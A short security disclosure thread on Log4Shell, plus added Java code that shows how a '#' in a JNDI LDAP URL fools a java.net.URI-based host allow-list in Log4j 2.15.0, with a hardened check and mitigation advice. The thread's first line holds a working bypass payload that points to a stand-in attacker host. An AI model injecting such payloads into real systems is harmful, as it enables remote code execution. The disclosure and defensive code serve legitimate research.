FIX: Here is a PoC on how to bypass the allowedLdapHost and allowedClasses checks in Log4J 2.15.0 to achieve RCE: ${jndi:ldap://127.0.0.1#evilhost.com:1389/a}, and to bypass allowedClasses just choose a name for a class in the JDK. Deserialization will occur as usual. #Log4Shell 1/n
This happens because of how the check was done. The java.net.URI getHost() method returns the value before the # as the real host, but the JNDI/LDAP resolver will resolve the full hostname string, attempting to connect to the malicious LDAP server. 2/n
Also, credit to @pwntester and @_atorralba for being the first to shed some light on that behavior; if it weren't for their research I probably wouldn't be looking into this. 🙏
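The parser mismatch described in the thread, as an added example that is not the thread author's code nor Log4j's own source: a minimal allow-list check that trusts java.net.URI.getHost() (the 2.15.0-style check) next to a hardened variant that rejects any URL the generic URI parser and the LDAP provider's own URL parser could read differently. The ALLOWED_HOSTS set and both check methods are hypothetical stand-ins for the allowedLdapHost logic.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Set;

public class JndiHostCheck {
    // Hypothetical allow-list standing in for Log4j's allowedLdapHost setting.
    static final Set<String> ALLOWED_HOSTS = Set.of("127.0.0.1", "localhost");

    // Weak check: trusts java.net.URI.getHost(), which stops at the '#' because
    // everything after it is treated as the URI fragment.
    static boolean weakCheck(String jndiUrl) throws URISyntaxException {
        URI uri = new URI(jndiUrl);
        return ALLOWED_HOSTS.contains(uri.getHost());
    }

    // Hardened check: refuse anything the two parsers could disagree on before
    // consulting the allow-list (fragment, userinfo, unexpected scheme).
    static boolean hardenedCheck(String jndiUrl) {
        if (jndiUrl.contains("#") || jndiUrl.contains("@")) {
            return false;
        }
        URI uri;
        try {
            uri = new URI(jndiUrl);
        } catch (URISyntaxException e) {
            return false;
        }
        if (uri.getFragment() != null || uri.getUserInfo() != null) {
            return false;
        }
        String scheme = uri.getScheme();
        if (!"ldap".equals(scheme) && !"ldaps".equals(scheme)) {
            return false;
        }
        String host = uri.getHost();
        return host != null && ALLOWED_HOSTS.contains(host);
    }

    public static void main(String[] args) throws Exception {
        // The URL from the thread, used only to show how each parser slices it.
        String url = "ldap://127.0.0.1#evilhost.com:1389/a";
        URI uri = new URI(url);
        System.out.println("getHost()     = " + uri.getHost());      // host as java.net.URI sees it
        System.out.println("getFragment() = " + uri.getFragment());  // the part the LDAP provider still uses
        System.out.println("weak check     = " + weakCheck(url));     // allow-list is satisfied
        System.out.println("hardened check = " + hardenedCheck(url)); // rejected on the '#'
        System.out.println("plain allowed  = " + hardenedCheck("ldap://127.0.0.1:1389/a"));
    }
}
```

The hardened variant only narrows the host check; as the thread notes, the allowedClasses check and the deserialization path are separate problems, which is why disabling JNDI lookups entirely is the safer mitigation.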